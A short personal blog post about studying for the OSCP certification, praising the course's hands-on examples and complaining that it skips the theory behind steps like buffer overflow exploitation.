I started the OSCP a couple of weeks ago, and I’m about halfway. It’s been pretty good so far, lots of interesting stuff, with a very practical edge. The difficulty level is pitched very well, all of the examples are designed to be followed along, which is a plus. Of course I’ve had some challenges, like wondering why my bind shell exploit isn’t connecting to my netcat listener, but I like to think of those moments as (extremely frustrating) learning experiences.
My only complaint to far would have to be the lack of theory. The examples are great, and very practical, but there’s no background, just the technical steps. For example, with a buffer overflow, you send the data, a unique string, a list of all hex characters, a return address, shellcode, in that order (or there abouts). But, why does that work? I understand why the process works, but what about why the computer is doing that? I (personally) think that it’s important to know what the deal with the stack is, and how EIP is being overwritten, or to learn a little bit of assembly when looking for a jmp esp instruction, to really understand what’s going on, instead of just following a procedure.
Either way, here’s hoping the exam isn’t too much harder than the labs.
My Portfolio 